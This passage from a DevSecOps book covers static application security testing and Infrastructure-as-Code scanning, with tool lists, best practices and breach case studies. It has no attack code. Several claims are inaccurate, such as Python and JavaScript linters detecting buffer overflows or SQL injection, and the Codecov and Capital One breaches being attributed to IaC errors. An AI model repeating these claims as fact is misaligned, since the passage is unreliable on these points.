The benefits of SAST SAST provides several benefits for organizations looking to improve the security of their software applications. Here are some of the key benefits of SAST: • Early identification of security vulnerabilities: SAST tools analyze application source code before it is compiled and deployed, allowing vulnerabilities to be identified early in the development cycle. This enables organizations to remediate vulnerabilities before they are deployed into production, reducing the risk of security incidents and minimizing the cost of remediation. • Integration into the development process: SAST tools can be integrated into the SDLC, providing feedback to developers during the coding process. This allows developers to address vulnerabilities as they are introduced, reducing the need for post-release remediation. • Comprehensive analysis: SAST tools can perform a comprehensive analysis of the application source code, identifying potential vulnerabilities that may not be apparent through other security testing methods. This allows organizations to identify and remediate security risks that may have been missed by other testing methods. • Accuracy: SAST tools can provide highly accurate results, with low false positive rates. This helps reduce the amount of time and effort spent on remediation as developers can be confident that identified vulnerabilities are genuine. • Cost-effective: SAST tools can be a cost-effective way of identifying and remediating security vulnerabilities as they can be integrated into the software development process and provide early feedback to developers. This helps reduce the cost of remediation as vulnerabilities can be addressed before they are deployed into production. • Compliance: SAST tools can help organizations meet regulatory and compliance requirements by identifying and remediating security vulnerabilities that could lead to data breaches or other security incidents. • Scalability: SAST tools can be scaled to accommodate large and complex applications, making them suitable for use in enterprise-level software development projects.

The limitations of SAST While SAST can identify vulnerabilities early in the software development process, it can produce false positives and false negatives, has a limited scope, and is less effective against certain types of vulnerabilities. SAST should be used in combination with other security testing techniques to ensure that software applications are secure and resilient against security risks. Here are some of the key limitations of SAST: • False positives: SAST tools can produce false positives, which are security vulnerabilities that are reported by the tool but do not exist in the code. False positives can be time-consuming

121

122

Static Application Security Testing (SAST)

to remediate as they require additional analysis and can take resources away from more critical vulnerabilities. • False negatives: SAST tools may miss actual vulnerabilities, leading to a false sense of security. • Limited context: SAST tools analyze application source code in isolation, without considering how the code interacts with other components or the overall system architecture. This can lead to vulnerabilities being missed as they may only become apparent when the application is running in a live environment. • Limited scope: SAST tools only analyze the application source code, which means that they may not identify vulnerabilities that are introduced by third-party libraries, frameworks, or components. These vulnerabilities may only become apparent when the application runs in a live environment. • Code quality: SAST tools are designed to identify security vulnerabilities, but they may not detect issues related to code quality or maintainability. This can lead to software that is difficult to maintain or modify, which can increase the risk of future security vulnerabilities. • Complexity: SAST tools can be complex and require significant expertise to configure and use effectively. This can make them difficult to use for organizations that do not have dedicated security teams or expertise in security testing. • Limited testing coverage: SAST tools may not provide comprehensive testing coverage, particularly for complex applications that have multiple layers of code or complex system architectures. This can lead to vulnerabilities being missed, particularly those that are introduced by application interactions or external dependencies. • Lack of user input: SAST tools cannot simulate user inputs or interactions, which can limit their ability to identify vulnerabilities that may only become apparent during normal application use. • Dependence on the quality of the input: SAST tools depend on the quality of the input, which means that poorly written or incomplete code can result in incomplete or inaccurate analysis.

Open source SAST tools Several open source SAST tools are available that organizations can use to identify security vulnerabilities in their code. Here are some of the most popular ones: • Bandit: Bandit is a SAST tool explicitly designed for Python applications. It identifies common security issues such as SQL injection, XSS, and buffer overflows. Bandit can be integrated with popular development environments such as PyCharm and Visual Studio Code, and it provides detailed reports that highlight vulnerabilities and recommended remediation steps. It is available for free on GitHub. Link: https://github.com/PyCQA/bandit

Open source SAST tools

• FindSecBugs: FindSecBugs is a SAST tool that identifies security vulnerabilities in Java applications. It can identify vulnerabilities such as SQL injection, command injection, and XSS. FindSecBugs can be used with popular Java development environments such as Eclipse and IntelliJ IDEA, and it provides detailed reports that highlight vulnerabilities and recommended remediation steps. It is available for free on GitHub. Link: https://github.com/find-sec-bugs/find-sec-bugs • PMD: PMD is a SAST tool that can be used to analyze code written in multiple programming languages, including Java, JavaScript, and PHP. PMD identifies vulnerabilities such as buffer overflows, SQL injection, and XSS. PMD provides detailed reports that highlight vulnerabilities and recommended remediation steps. It is available for free on GitHub. Link: https://github.com/pmd/pmd • ESLint: ESLint is a SAST tool that identifies security vulnerabilities in JavaScript applications. It can identify vulnerabilities such as XSS, SQL injection, and command injection. ESLint can be integrated with popular JavaScript development environments such as Visual Studio Code and Atom, and it provides detailed reports that highlight vulnerabilities and recommended remediation steps. It is available for free on GitHub. Link: https://github.com/eslint/eslint • RIPS: RIPS is a SAST tool that identifies security vulnerabilities in PHP applications. It can identify vulnerabilities such as SQL injection, XSS, and code injection. RIPS provides detailed reports that highlight vulnerabilities and recommended remediation steps. It is available for free on GitHub. Link: https://github.com/robocoder/rips-scanner • Snyk is another popular freemium SAST tool that organizations can use to identify security vulnerabilities in their code. Snyk supports multiple programming languages, including Java, JavaScript, Ruby, Python, and Go, and can identify vulnerabilities such as SQL injection, XSS, and remote code execution. Snyk offers a range of features such as integration with popular development environments such as Visual Studio Code and IntelliJ IDEA, and provides detailed reports that highlight vulnerabilities and recommended remediation steps. Additionally, Snyk can be integrated with popular DevOps tools such as GitHub, GitLab, and Jenkins, allowing for seamless integration with the development workflow. Link: https://github.com/snyk/snyk • Brakeman: Brakeman is a SAST tool designed for Ruby on Rails applications. It can identify vulnerabilities such as SQL injection, XSS, and command injection. Brakeman provides detailed reports that highlight vulnerabilities and recommended remediation steps. It can be integrated with popular Ruby on Rails development environments such as Atom and Visual Studio Code. Link: https://brakemanscanner.org/

123

124

Static Application Security Testing (SAST)

• Gosec: Gosec is a SAST tool designed for the Go programming language. It can identify vulnerabilities such as SQL injection, XSS, and buffer overflows. Gosec provides detailed reports that highlight vulnerabilities and recommended remediation steps. It can be integrated with popular Go development environments such as Visual Studio Code and IntelliJ IDEA. Link: https://github.com/securego/gosec • Infer: Infer is a SAST tool designed for the C, C++, and Java programming languages. It can identify vulnerabilities such as null pointer dereference, buffer overflows, and memory leaks. Infer provides detailed reports that highlight vulnerabilities and recommended remediation steps. It can be integrated with popular development environments such as IntelliJ IDEA and Visual Studio. Link: https://fbinfer.com/ These open source SAST tools can be useful for organizations that want to perform security testing on their code without investing in expensive commercial SAST tools. However, it is important to note that open source SAST tools may not be as comprehensive or effective as commercial tools, and may require more manual configuration and setup.

Case study 1 A software development company was in the process of building a new web application for a client. As part of their development process, they were using a combination of manual code reviews and automated testing tools, including SAST. They had integrated SAST into their development pipeline and were running it regularly to identify any potential security vulnerabilities in their code. During one of their SAST scans, they discovered a critical vulnerability in their application code. The vulnerability was a classic SQL injection flaw that could allow an attacker to execute arbitrary SQL commands on the underlying database. If left unaddressed, this vulnerability could have potentially exposed sensitive customer data and allowed attackers to take control of the application. Thanks to the early detection provided by SAST, the development team was able to quickly remediate the issue before deploying the application to production. They fixed the vulnerability by implementing parameterized SQL queries, a best practice that helps prevent SQL injection attacks. The team also took this opportunity to review their development practices and implement additional security measures, such as regular security training for their developers and the use of additional security testing tools. This incident highlighted the importance of incorporating SAST into their development process and the value of having a strong security posture. In the end, the company was able to deliver a secure and reliable application to their client, thanks in part to the early detection provided by SAST. The incident also served as a valuable learning experience for the team and helped them improve their overall approach to software security.

Case study 2

Case study 2 A large financial institution was in the process of building a new online banking application. The application was designed to give customers a convenient and secure way to manage their accounts and conduct online transactions. As part of their development process, they integrated SAST into their development pipeline to identify any potential security vulnerabilities in their code. During one of their SAST scans, they discovered a critical vulnerability in their application code. The vulnerability was a remote code execution flaw that could allow an attacker to execute arbitrary code on the server hosting the application. If left unaddressed, this vulnerability potentially exposed sensitive customer data and allowed attackers to take control of the application and the underlying infrastructure. Thanks to the early detection provided by SAST, the development team was able to quickly remediate the issue before deploying the application to production. They fixed the vulnerability by implementing input validation and sanitization, a best practice that helps prevent remote code execution attacks. The team also took this opportunity to review their development practices and implement additional security measures, such as code reviews and penetration testing. They also conducted regular security training for their developers to ensure that they were aware of the latest security threats and best practices. This incident highlighted the importance of incorporating SAST into their development process and the value of having a strong security posture. It also demonstrated the benefits of integrating security into the SDLC, rather than treating it as an afterthought. In the end, the financial institution was able to deliver a secure and reliable online banking application to their customers, thanks in part to the early detection provided by SAST. The incident also served as a valuable learning experience for the team and helped them to improve their overall approach to software security.

Loss due to not following the SAST process It is difficult to quantify the exact amount of loss that has occurred as a result of not following SAST processes since the impact of a security breach can vary widely, depending on the nature and scope of the breach, the industry in which it occurred, and other factors. However, data breaches can result in significant financial losses, both for the affected organization and for its customers. In addition to direct costs such as legal fees, remediation costs, and lost revenue, there can be indirect costs, such as damage to reputation, loss of customer trust, and decreased shareholder value. According to a 2021 report by IBM, the average total cost of a data breach was $4.24 million in 2021, up from $3.86 million in 2020. This includes costs such as investigation and escalation, notification and communication, legal and regulatory expenses, and remediation and recovery.

125

126

Static Application Security Testing (SAST)

Furthermore, the report found that the longer it took to detect and contain a breach, the higher the cost. Breaches that were detected in less than 200 days had an average total cost of $3.68 million, while breaches that took more than 200 days to detect and contain had an average total cost of $4.8 million. These figures illustrate the importance of implementing strong SAST processes and incorporating security into the SDLC to detect and remediate vulnerabilities early before they can be exploited by attackers. By doing so, organizations can help minimize the financial and reputational damage caused by security breaches.

Summary In conclusion, SAST is a crucial process in software development that helps identify security vulnerabilities early in the development life cycle. By analyzing the source code of an application for potential security issues, SAST tools can help developers fix issues before they are deployed into production, reducing the risk of security breaches. SAST offers several benefits, including early detection of vulnerabilities, cost-effective security testing, and the ability to identify security issues in third-party code. However, it also has limitations, including the potential for false positives and false negatives, and the inability to detect certain types of security issues. Despite these limitations, SAST is a critical component of a comprehensive application security program. It should be used in conjunction with other security measures, such as SCA and manual penetration testing, to provide a multi-layered approach to application security. Implementing strong SAST processes and integrating SAST tools into the SDLC can help organizations identify and remediate vulnerabilities early before they can be exploited by attackers. This can ultimately save organizations significant financial and reputational damage caused by security breaches, as well as help protect the personal information of customers and users. Consider the following points when it comes to SAST: • Integration with CI/CD pipelines: SAST tools can be integrated with CI/CD pipelines to automate the testing process and ensure that code is checked for vulnerabilities at every stage of the development life cycle. • Language support: Different SAST tools support different programming languages, so it’s important to choose a tool that supports the languages used in your application. • False positives and false negatives: SAST tools can generate false positives (identifying a non-issue as a vulnerability) and false negatives (failing to identify an actual vulnerability). It’s important to understand how the tool works and configure it appropriately to reduce these occurrences. • Tool selection: There are many SAST tools available, both open source and commercial. It’s important to choose a tool that fits your specific needs and budget, taking into account factors such as ease of use, language support, and reporting capabilities.

Summary

• Ongoing maintenance: SAST tools require ongoing maintenance to ensure that they remain effective. This includes updating the tool to the latest version, configuring it correctly, and ensuring that it is integrated with the development process. SAST is a valuable tool for identifying security vulnerabilities early in development. While it has its limitations, it should be part of a broader approach to application security that includes other tools and techniques such as SCA, penetration testing, and ongoing monitoring and maintenance. In the next chapter, we will learn more about cloud-native technologies that help in testing security in an orchestrated environment – that is, Infrastructure as Code (IaC) scanning.

127

10 Infrastructure-as-Code (IaC) Scanning Infrastructure-as-Code (IaC) scanning is the process of creating the code and configuration files that are used to manage and provision infrastructure resources, such as virtual machines, networks, and storage, in a cloud environment. IaC is a method of managing and provisioning computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools. IaC should go through security checks and there are IaC security scanning tools that are designed to identify security vulnerabilities and misconfigurations in the infrastructure code, potentially exposing the environment to security threats. The scanning process is typically automated and integrated into the CI/CD pipeline, which allows for early detection of security issues and ensures that infrastructure code is tested and validated before it is deployed. IaC scanning is an essential component of a comprehensive security strategy. By detecting and addressing security issues early in the development process, organizations can reduce the risk of security breaches and ensure that their infrastructure is secure and compliant with regulatory requirements. In this chapter, we will cover the following aspects of IaC: • What is IaC? • The importance of IaC scanning • IaC security best practices • IaC in DevSecOps • Open source IaC tools • Case studies

130

Infrastructure-as-Code (IaC) Scanning

What is IaC? IaC is an approach to managing infrastructure using code. With IaC, infrastructure resources such as virtual machines, networks, and storage are defined and managed through code. This means we don’t have to manually configure these resources through a graphical user interface (GUI) or commandline interface (CLI). Using IaC, developers and system administrators can automate the process of provisioning and managing infrastructure resources, making it easier to scale and manage complex environments. The code to manage the infrastructure can be version-controlled, tested, and deployed using the same DevOps practices that are used for application code, allowing for faster and more reliable deployments. IaC typically uses configuration management tools such as Terraform or Ansible. These tools allow developers and system administrators to define infrastructure resources declaratively, specifying the desired state of the infrastructure in code. The tools then automatically provide the necessary resources and ensure that the infrastructure is configured correctly. IaC is a powerful approach to managing infrastructure in the cloud, enabling organizations to automate and streamline provisioning and managing infrastructure resources.

The importance of IaC scanning IaC scanning is an essential practice to maintain the security, consistency, and reliability of infrastructure. IaC scanning ensures that the code-defining infrastructure complies with best practices and does not introduce vulnerabilities. IaC scanning is a cornerstone of modern, secure, and efficient infrastructure management. As infrastructure grows in complexity, and as cyber threats become more sophisticated, the importance of scanning and validating IaC becomes even more pronounced. Integrating IaC scanning into the development and deployment processes ensures a robust, secure, and efficient infrastructure that meets organizational needs while minimizing risks. Let’s delve into the different aspects of IaC scanning.

IaC toolset functionalities IaC scanning tools typically analyze code written in configuration management languages, such as Terraform, Ansible, or CloudFormation, and identify issues such as the following: • Misconfigurations: IaC scanning can detect when configuration settings are incorrect or do not comply with best practices, which can result in security vulnerabilities. • Access control: IaC scanning can detect when access control policies are not properly defined, potentially allowing unauthorized access to infrastructure resources. • Secrets management: IaC scanning can detect when sensitive data, such as passwords or access keys, are hardcoded in the code, which can lead to data breaches.

The importance of IaC scanning

• Compliance: IaC scanning can detect when infrastructure code does not comply with regulatory or industry-specific requirements, such as HIPAA or PCI DSS. • Version control: Just like your application code, infrastructure can be version-controlled. This allows for easy rollbacks, understanding of changes made, and collaboration among teams. • Consistency: By defining infrastructure in code, you ensure that the infrastructure is consistent every time it is deployed. No more “it works on my machine” issues. • Reproducibility: You can recreate the entire infrastructure by running the code again. This is invaluable in disaster recovery situations and also when scaling. • Documentation: Since the infrastructure is codified, the code acts as documentation. Anyone looking at the code can understand the infrastructure setup. • Integration with CI/CD: IaC fits well with CI/CD methodologies, allowing infrastructure changes to be part of the CI/CD pipeline. • Cost savings: By automating infrastructure, you reduce manual labor. Plus, it’s easier to spin up and down resources as needed, which can save costs. • Improved security: Templates and scripts ensure that the correct security configurations are always applied. This reduces the risk of human error.

Advantages and disadvantages of IaC Let’s look at the advantages and disadvantages of IaC. The following are the advantages: • Consistency: IaC allows infrastructure to be defined and managed in a consistent, repeatable manner, reducing the risk of human error and ensuring that infrastructure is always configured the same way • Speed: IaC automates the process of deploying infrastructure resources, reducing the time and effort required to provision and configure environments • Agility: IaC allows teams to quickly adapt to changing business requirements by rapidly provisioning and scaling infrastructure resources • Version control: IaC can be stored in version control systems such as Git, allowing teams to track changes to infrastructure resources over time and roll back changes if necessary • Collaboration: IaC can be shared among team members, promoting collaboration and enabling teams to work together more efficiently • Scalability: IaC enables infrastructure to be easily scaled up or down as needed, making it an ideal approach for cloud-based infrastructure

131

132

Infrastructure-as-Code (IaC) Scanning

• Reproducibility: IaC makes it easy to reproduce infrastructure environments, which can be especially useful in testing and development scenarios The following are the disadvantages: • Learning curve: There is a learning curve associated with IaC tools and their associated languages and frameworks, which can be a barrier to adoption for some teams • Complexity: IaC can be complex, especially in large, distributed environments, and requires a high level of expertise and discipline to manage effectively • Tooling dependencies: IaC tools require additional tooling, such as version control systems and configuration management tools, which can be costly and time-consuming to implement • Security risks: IaC introduces new security risks, such as misconfigured infrastructure and insecure code, which must be managed carefully • Debugging: Debugging issues with IaC can be challenging and time-consuming, especially when dealing with complex infrastructure environments • Overreliance on automation: There is a risk of over-reliance on automation with IaC, which can lead to a lack of human oversight and potentially serious consequences in the event of a failure or security breach

Identifying vulnerabilities using IaC By using IaC, teams can more easily identify and address vulnerabilities in their infrastructure resources, leading to a more secure and resilient environment: • Static analysis: Just like with code, IaC files can be analyzed statically for potential security issues. For example, tools can check for insecure network configurations, hardcoded secrets, or incorrect user permissions. Static analysis can help identify vulnerabilities early in the development process and prevent them from making it into production environments. • Integration with vulnerability scanning tools: IaC tools can be integrated with vulnerability scanning tools to automatically check infrastructure resources for known vulnerabilities. This can help teams stay on top of security issues and proactively address potential threats. • Compliance checks: IaC tools can be used to enforce compliance requirements and security best practices. For example, a tool can be configured to ensure that all resources are encrypted, or that all security groups follow a specific set of rules. Compliance checks can help identify potential vulnerabilities and ensure infrastructure resources are configured securely. • Auditing: Because IaC is version-controlled, it can be audited to ensure that infrastructure resources have been configured securely over time. This can help with compliance and regulatory requirements, as well as provide insight into potential vulnerabilities or security issues.

The importance of IaC scanning

What is the IaC process? The process for implementing IaC involves several steps: 1. Define the infrastructure requirements: This involves identifying the infrastructure requirements for the application, such as the number and type of servers, the network architecture, and storage needs. 2. Create the infrastructure code: The next step is to create the infrastructure code using a tool such as Terraform or CloudFormation. The infrastructure code specifies the resources needed for the application, such as virtual machines, load balancers, and databases. 3. Version control the infrastructure code: The infrastructure code is checked into version control, just like the application code. This ensures that changes to the infrastructure can be tracked and rolled back if necessary. 4. Test the infrastructure code: The infrastructure code is tested to ensure that it works as expected. This includes verifying that the resources are created correctly and that they are configured securely. 5. Deploy the infrastructure code: Once the infrastructure code has been tested, it can be deployed to the target environment using a tool such as Jenkins or Ansible. 6. Monitor the infrastructure: After the infrastructure code has been deployed, it is important to monitor the infrastructure to ensure that it is performing as expected and that there are no security vulnerabilities. 7. Update the infrastructure code: As the application evolves, it may be necessary to update the infrastructure code to add or remove resources. These changes should be made using the same process as before, including version control, testing, and deployment. By following these steps, organizations can ensure that their infrastructure is secure, reliable, and compliant with industry standards. This approach also helps reduce the risk of errors and misconfigurations that can lead to security breaches and downtime.

IaC metrics IaC metrics are used to measure the performance and effectiveness of the IaC process. Organizations can track the performance of their IaC process and identify areas for improvement. This helps ensure that the infrastructure is secure, reliable, and compliant with industry standards. Some common IaC metrics include the following: • Code coverage: Code coverage measures the percentage of infrastructure code that has been tested. This metric helps identify areas of the infrastructure that may be more prone to errors and vulnerabilities.

133

134

Infrastructure-as-Code (IaC) Scanning

• Deployment frequency: Deployment frequency measures how often changes are deployed to the infrastructure. This metric helps identify bottlenecks in the deployment process and ensure that changes are being deployed in a timely and efficient manner. • Mean time to recovery (MTTR): MTTR measures the time it takes to recover from an infrastructure failure. This metric helps identify areas of the infrastructure that may need to be improved to reduce downtime and improve reliability. • Security vulnerabilities: Security vulnerabilities measure the number and severity of vulnerabilities in the infrastructure code. This metric helps identify areas of the infrastructure that may be at risk of attack and ensure that security is being addressed proactively. • Compliance: Compliance measures the extent to which the infrastructure code complies with industry standards and regulations. This metric helps ensure that the infrastructure is secure, reliable, and compliant with industry best practices.

IaC versus SAST IaC focuses on identifying vulnerabilities in the infrastructure itself by treating infrastructure as code and applying the same software development practices to infrastructure management. IaC tools analyze the code that’s used to create infrastructure resources and provide recommendations for how to improve security, compliance, and resilience. SAST, on the other hand, focuses on identifying vulnerabilities in application code. SAST tools analyze the source code of an application to identify potential security flaws, such as SQL injection or buffer overflow vulnerabilities. While both approaches are important for ensuring overall security, they have different scopes and focus on different aspects of the system. IaC is more concerned with ensuring that the infrastructure itself is secure, while SAST focuses on the application code. In some cases, IaC and SAST can be complementary, as vulnerabilities in the infrastructure can also affect the application and vice versa. However, they are distinct approaches that require different tools and expertise to implement effectively. In addition to the differences in scope and focus, there are other important differences between IaC and SAST. Here are some examples: • Tools: As mentioned earlier, IaC tools focus on analyzing infrastructure code (such as Terraform or CloudFormation templates) and provide recommendations for improving security, compliance, and resilience. SAST tools, on the other hand, focus on analyzing application code (such as Java or Python code) and provide recommendations for improving security in the application itself. • Process: Implementing IaC involves integrating infrastructure code into the software development process, which means that infrastructure changes are subject to the same code review, testing, and deployment processes as application code. SAST, on the other hand, is typically implemented as a separate process from application development and may involve running automated scans on the code periodically.

IaC security best practices

• Expertise: Implementing IaC requires knowledge of infrastructure design, cloud computing, and automation tools. SAST requires knowledge of programming languages, security vulnerabilities, and secure coding practices. • Cost: The cost of implementing IaC and SAST can vary widely, depending on the tools, infrastructure, and expertise required. IaC tools may require additional resources to set up and manage, while SAST tools may require specialized expertise to interpret and act on the results.

IaC security best practices Ensuring security within IaC is paramount as it directly affects the provisioning and configuration of resources. Here are some detailed IaC security best practices and examples: • Use secret management systems Do not hardcode secrets or sensitive information in your IaC scripts. Instead of embedding API keys or database passwords in your Terraform script, use tools such as AWS Secrets Manager, HashiCorp Vault, or Azure Key Vault to fetch them at runtime. • Keep IaC configurations in version control Use version control systems (such as Git) to track changes, audit modifications, and roll back if necessary. Use Git branches to represent different environments. A pull request can act as a gateway for changes, ensuring peer review before deployment. • Regularly audit and update dependencies Periodically review and update modules, plugins, or dependencies your IaC scripts rely on. If using Terraform, you can use terraform init to see if newer versions of providers or modules are available and consider updating them. • Principle of least privilege Grant only the permissions necessary to perform a task. Avoid overly permissive policies. If a Terraform script only needs to launch EC2 instances in AWS, ensure the associated IAM policy doesn’t have permission to modify RDS databases or S3 buckets. • Immutable infrastructure Instead of updating existing infrastructure, replace it. This reduces the chances of lingering vulnerabilities. When a new version of an application is ready to be deployed, use a tool such as Packer to create a new machine image. Deploy the application on new instances created from this image, then terminate the old instances. • Validate IaC scripts with automated tools Use tools that scan IaC scripts for security misconfigurations or vulnerabilities. Tools such as Checkmarx, Bridgecrew (for Terraform), or tfsec can automatically analyze Terraform scripts for security flaws.

135

136

Infrastructure-as-Code (IaC) Scanning

• Isolate environments Ensure development, staging, and production environments are isolated from each other. Use separate AWS accounts or VPCs for different environments. Avoid using production secrets or credentials in development or staging. • Implement logging and monitoring Ensure that all infrastructure deployments and operations are logged and monitored. Set up AWS CloudTrail for AWS deployments or Azure Activity Log for Azure to track activities. Use centralized logging solutions such as the ELK Stack or Graylog to consolidate logs. • Limit direct access Limit SSH and RDP access to infrastructure. If access is necessary, use jump hosts, VPNs, or short-lived credentials. Instead of allowing SSH access from any IP, restrict it to a specific IP or VPN. Tools such as AWS Systems Manager Session Manager can provide SSH-like access without the need to open SSH ports. • Regularly review and refactor IaC scripts Periodically review IaC scripts to ensure they adhere to updated best practices and remove any deprecated configurations or resources. Terraform provides terraform fmt for code formatting and terraform validate for checking for any inconsistencies or errors. Organizations can significantly improve the security posture of their IaC and the resulting infrastructure. Regular audits, reviews, and continuous education are key components of ensuring security in the rapidly evolving tech landscape.

IaC in DevSecOps IaC plays a critical role in DevSecOps, which integrates development, security, and operations into a unified process. The key principle behind DevSecOps is integrating security practices as a fundamental part of the DevOps process rather than an afterthought. Let’s dive into how IaC fits into the DevSecOps approach, providing more details and outlining the process.

Understanding DevSecOps • Definition: DevSecOps emphasizes embedding security checks and controls seamlessly into the DevOps life cycle • Goal: To catch vulnerabilities and flaws early in the SDLC, thereby reducing risks and achieving both speed and security

IaC in DevSecOps

The role of IaC in DevSecOps • Automated provisioning: IaC allows for the automated setup, modification, and scaling of infrastructure, ensuring that the environment is consistently and securely provisioned • Version control: All infrastructure changes can be tracked, reviewed, and rolled back if necessary, enhancing transparency and accountability • Reproducibility: IaC ensures environments are consistently reproducible, eliminating the “works on my machine” problem

The DevSecOps process with IaC 1. Planning and coding: ‚ Threat modeling: Identify potential threats and design infrastructure to mitigate them ‚ IaC scripting: Write IaC scripts to provision the necessary infrastructure ‚ Version control: Store IaC scripts in a version control system, such as Git, ensuring that changes are tracked 2. Integration and testing: ‚ IaC scanning: Before provisioning, scan IaC scripts for vulnerabilities using tools such as Checkmarx or tfsec ‚ CI: Automatically test infrastructure changes to ensure they don’t introduce defects or vulnerabilities ‚ Feedback loops: If vulnerabilities or misconfigurations are detected, they are reported back to the development team for immediate rectification 3. Deployment: ‚ Automated deployment: Use IaC tools such as Terraform or AWS CloudFormation to automatically deploy infrastructure ‚ Immutable infrastructure: Use IaC to enforce immutability, where old infrastructure components are replaced with new ones rather than being modified, reducing vulnerabilities 4. Operations and monitoring: ‚ Continuous monitoring: Use monitoring tools to continuously watch for unusual or unauthorized activities ‚ Alerting: Set up automated alerts for suspicious activities or when thresholds are breached ‚ Infrastructure drift detection: Regularly check to ensure that the actual infrastructure aligns with what’s defined in the IaC scripts

137

138

Infrastructure-as-Code (IaC) Scanning

5. Feedback and iteration: ‚ Continuous feedback: Incorporate feedback regarding security vulnerabilities or misconfigurations into the IaC scripts ‚ Iterative improvement: As new threats emerge or the infrastructure needs change, continuously improve and adapt IaC scripts

Key benefits • Speed and security: IaC in DevSecOps ensures that security doesn’t compromise speed, and vice versa • Proactive security: Potential threats are mitigated proactively, reducing the chances of breaches or vulnerabilities being exploited • Cost-effective: By identifying and rectifying vulnerabilities early, organizations can avoid costly fixes in the later stages or post-deployment

Challenges and mitigation • Complexity: With the intertwining of security, development, and operations, processes can become complex. Adopting modular IaC scripts and maintaining documentation can help. • Skill gaps: DevSecOps requires professionals to understand development, security, and operations. Investing in continuous training and knowledge sharing is essential.

Conclusion and future outlook As the technological landscape evolves, IaC’s role in DevSecOps will continue to be paramount. Embracing practices such as containerization, serverless architectures, and edge computing will necessitate a robust IaC strategy integrated with DevSecOps.

Open source IaC tools IaC scanning tools can also generate reports that provide developers with detailed information on security vulnerabilities and misconfigurations, along with recommended remediation steps. This allows developers to quickly address security issues and ensure that infrastructure code is secure and compliant with relevant standards. There are several IaC tools available in the market, each with its unique features and functionalities. The following are some popular IaC tools: • Terraform: Terraform is an open source tool developed by HashiCorp. It allows users to describe infrastructure resources using a simple configuration language and manage them

Case study 1 – the Codecov security incident

through code. Terraform can be used to provision resources in a variety of cloud providers, such as AWS, Azure, Google Cloud, and more. • Ansible: Ansible is an open source automation tool that can be used for configuration management, application deployment, and provisioning infrastructure. Ansible allows users to define infrastructure as code using a simple YAML-based language. It can be used to manage resources in both cloud and on-premises environments. • CloudFormation: CloudFormation is an AWS-specific IaC tool that allows users to create and manage AWS resources using templates written in JSON or YAML. It allows users to define infrastructure resources such as EC2 instances, load balancers, and more and can be used to create, update, and delete resources in a stack. • Pulumi: Pulumi is an open source IaC tool that allows users to define infrastructure as code using familiar programming languages such as Python, TypeScript, and Go. Pulumi can be used to provision and manage resources in a variety of cloud providers such as AWS, Azure, and Google Cloud. • Chef: Chef is an open source automation tool that can be used for configuration management, application deployment, and provisioning infrastructure. It allows users to define infrastructure as code using a simple Ruby-based language. Chef can be used to manage resources in both cloud and on-premise environments. • Puppet: Puppet is an open source IaC tool that offers a declarative language to define the infrastructure and automate its management. It is suitable for managing complex environments and offers support for multiple cloud providers. • SaltStack: SaltStack is an open source IaC tool that enables users to automate infrastructure configuration and management. It is agent-based and supports multiple cloud providers. These IaC tools provide a range of functionalities, such as defining infrastructure resources, managing the life cycle of resources, version control of infrastructure code, and more. They allow users to manage infrastructure resources in a scalable, efficient, and repeatable way, making it easier to manage complex environments and ensure consistency across deployments.

Case study 1 – the Codecov security incident One example of a security incident related to IaC involves a company called Codecov, which provides code coverage tools for software developers. In April 2021, Codecov announced that their infrastructure had been compromised by an attacker, resulting in a supply chain attack that affected many of their customers. The attack involved the theft of Codecov’s credentials for an Amazon Web Services (AWS) account, which contained a code signing key for their Bash Uploader tool. This tool is used by many of Codecov’s customers to upload code coverage reports to their platform.

139

140

Infrastructure-as-Code (IaC) Scanning

The attacker used the stolen credentials to modify the Bash Uploader code and add a malicious script that collected environment variables, including sensitive data such as access tokens and credentials, and sent them to a remote server controlled by the attacker. This allowed the attacker to gain unauthorized access to many of Codecov’s customers’ systems and data. This incident highlights the importance of securing IaC tools and processes as they can be a target for attackers looking to compromise the software supply chain. In this case, the attacker was able to exploit a weakness in Codecov’s IaC process, which allowed them to steal the AWS credentials and modify the Bash Uploader code. To prevent similar incidents, organizations should ensure that their IaC tools and processes are secure, including using secure authentication and access controls, monitoring for unauthorized modifications, and regularly auditing and updating their infrastructure code. It’s also important to stay informed of security vulnerabilities and patches for IaC tools and components and to have a plan in place for responding to security incidents.

Case study 2 – Capital One data breach Another example of the importance of IaC security can be seen in the Capital One data breach that occurred in 2019. In this incident, a hacker exploited a misconfigured firewall in an AWS environment, which led to the theft of the personal information of over 100 million Capital One customers. The root cause of the breach was a misconfigured web application firewall, which was discovered to have been misconfigured due to a configuration error in the IaC templates used to deploy the AWS environment. The hacker was able to exploit this misconfiguration and gain access to sensitive data. This incident highlights the importance of ensuring the security of IaC templates and configurations as any misconfigurations or vulnerabilities can have serious consequences for the security of the entire infrastructure. It also emphasizes the need for ongoing monitoring and testing to ensure that the infrastructure remains secure and free from vulnerabilities.

Case study 3 – Netflix environment improvement One example of the benefits of IaC can be seen in the story of how Netflix was able to improve its infrastructure using IaC tools. Before adopting IaC, Netflix had a manually managed infrastructure that was difficult to scale and prone to errors. They needed a solution that would allow them to quickly and easily spin up new resources as needed, while also ensuring consistency and reducing the risk of errors. To address these challenges, Netflix adopted an IaC approach using the open source tool known as Chef. This allowed them to automate the provisioning of their infrastructure, ensuring that each component was configured consistently and accurately. As a result, Netflix was able to greatly improve its infrastructure’s flexibility and scalability, while also reducing the risk of errors and misconfigurations. The IaC approach also made it easier for Netflix to test and deploy new changes, reducing the time and effort required to make updates. The story of Netflix’s adoption of IaC highlights the benefits of using these tools to automate infrastructure management, improve consistency and accuracy, and reduce the risk of errors and downtime.

Summary

Summary IaC offers significant advantages in terms of security and operational efficiency. By using IaC tools and processes, organizations can ensure that their infrastructure is consistently and accurately configured, reducing the risk of security vulnerabilities and other issues. IaC also allows organizations to easily scale their infrastructure as needed, making it easier to accommodate changing business needs and handle spikes in traffic or demand. This can help organizations avoid downtime and ensure that critical services remain available and secure. However, like any technology or process, IaC has its limitations and potential risks. It is important for organizations to carefully consider these factors and implement appropriate safeguards and monitoring to ensure that their IaC implementation remains secure and effective over time. Despite these benefits, organizations need to be aware of the potential limitations and risks of IaC. For example, IaC can be susceptible to errors or vulnerabilities that could compromise the security or reliability of the infrastructure. Organizations need to implement appropriate testing, monitoring, and security measures to mitigate these risks and ensure the overall effectiveness of their IaC implementation. In this chapter, we covered security testing aspects around IaC. In the next chapter, we’ll learn how to test QA or production environments via dynamic application security testing (DAST).

141

